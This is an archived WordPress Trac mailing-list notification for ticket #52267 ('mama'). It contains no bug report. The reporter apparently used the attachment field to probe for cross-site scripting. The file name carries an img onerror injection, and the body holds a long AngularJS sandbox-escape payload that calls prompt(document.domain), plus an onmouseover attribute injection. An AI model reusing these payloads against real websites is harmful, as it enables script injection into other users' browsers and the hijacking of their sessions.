[wp-trac] [WordPress Trac] #52267: mama
WordPress Trac
noreply at wordpress.org
Sat Jan 9 11:01:20 UTC 2021
#52267: mama
--------------------------+------------------------------
Reporter: khaledclay | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Resolution:
Keywords: | Focuses:
--------------------------+------------------------------
Changes (by khaledclay):
* Attachment "ma"><img src=0 onerror=confirm()>ma.txt" added.
{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,prompt(document.domain)))+';
astNode.argument={type:'Identifier',name:'foo'}; ");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a; }}"onmouseover='confirm();
--
Ticket URL: <https://core.trac.wordpress.org/ticket/52267>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list